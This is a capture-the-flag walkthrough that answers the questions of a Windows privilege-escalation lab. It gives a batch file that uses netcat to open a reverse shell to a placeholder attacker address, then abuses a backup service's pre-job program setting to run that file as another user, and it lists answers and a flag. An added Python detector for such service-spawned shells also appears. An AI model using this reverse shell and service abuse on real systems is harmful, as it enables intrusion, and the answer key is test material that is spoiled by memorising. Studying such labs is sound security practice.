1. Complete the username: p…..
ANS: pepper
EXPLANATION:
Step 1: net users
2. What is the OS version?
ANS: 10.0.17763 N/A Build 17763
EXPLANATION:
Step 1: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
3. What backup service did you find running on the system?
ANS: IperiusSvc
EXPLANATION:
Step 1: wmic service list
4. What is the path of the executable for the backup service you have identified?
ANS: C:\Program Files (x86)\Iperius Backup\IperiusService.exe
EXPLANATION:
5. Run the whoami command on the connection you have received on your attacking machine. What user do you have?
ANS: the-grinch-hack\thegrinch
EXPLANATION:
Step 1: Create a batch file with the following contents and save it as test.bat:
@echo off
C:\Users\McSkidy\Downloads\nc.exe ATTACK_IP 1337 -e cmd.exe
Step 2: Open Iperius Backup.exe
Step 3: Set up a listener on the attacking machine, on the same port the batch file connects to:
nc -nlvvp 1337
Step 4: Open Iperius Backup and create a new backup job
— set any folder to backup (c:\temp)
— set to any destination (c:\users\low\desktop)
— set program to run before backup job (c:\users\low\desktop\test.bat)
Step 5: Right-click on the newly created job and select “Run backup service as” the-grinch-hack\thegrinch
Step 6: A command prompt will appear on the attacking machine
C:\Program Files (x86)\Iperius Backup>whoami
whoami
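A defender's view of the steps above, as an added example that is not part of the original walkthrough: a Python check over process-creation records (Sysmon Event ID 1 style fields) that flags a shell the backup service starts on a script stored in a user-writable directory. The event records, the list of interpreters, the writable-path pattern and the pre-job.cmd file name are constructed assumptions.

```python
import ntpath
import re

# Service binary path as reported in question 4 (compared case-insensitively).
SERVICE_IMAGE = r"c:\program files (x86)\iperius backup\iperiusservice.exe"
# Assumption: interpreters worth alerting on when the backup service spawns them.
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# Assumption: locations a low-privileged user can normally write to.
# Paths containing spaces are not matched by this simple pattern.
USER_WRITABLE = re.compile(
    r'c:\\(users|temp|programdata)\\[^\s"]+\.(bat|cmd|ps1|vbs|exe)', re.I)


def suspicious_service_children(events):
    """Return (user, image, script_path) for each shell the backup service
    launched on a file that lives in a user-writable directory."""
    hits = []
    for ev in events:
        if ev.get("ParentImage", "").lower() != SERVICE_IMAGE:
            continue  # not started by the backup service
        if ntpath.basename(ev.get("Image", "")).lower() not in SHELLS:
            continue  # child is not a shell or script host
        match = USER_WRITABLE.search(ev.get("CommandLine", ""))
        if match:
            hits.append((ev.get("User", "?"), ev["Image"], match.group(0)))
    return hits


# Constructed sample records, not captured from a real host.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files (x86)\Iperius Backup\IperiusService.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "c:\users\low\desktop\test.bat"',
     "User": r"the-grinch-hack\thegrinch"},
    {"ParentImage": r"C:\Program Files (x86)\Iperius Backup\IperiusService.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Program Files (x86)\Iperius Backup\pre-job.cmd"',
     "User": r"the-grinch-hack\thegrinch"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c c:\users\low\desktop\test.bat",
     "User": r"the-grinch-hack\low"},
]

if __name__ == "__main__":
    for user, image, script in suspicious_service_children(SAMPLE_EVENTS):
        print(f"ALERT: backup service ran {script} via {image} as {user}")
```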
6. What is the content of the flag.txt file?
ANS: THM-736635221
EXPLANATION:
Step 1: Once we gain access, type cd ../../../
Step 2: dir
Step 3: cd Users
Step 4: dir
Step 5: cd thegrinch
Step 6: dir
Step 7: cd Documents
Step 8: type flag.txt
7. The Grinch forgot to delete a file where he kept notes about his schedule! Where can we find him at 5:30?
ANS: jazzercize
EXPLANATION:
Step 1: type Schedule.txt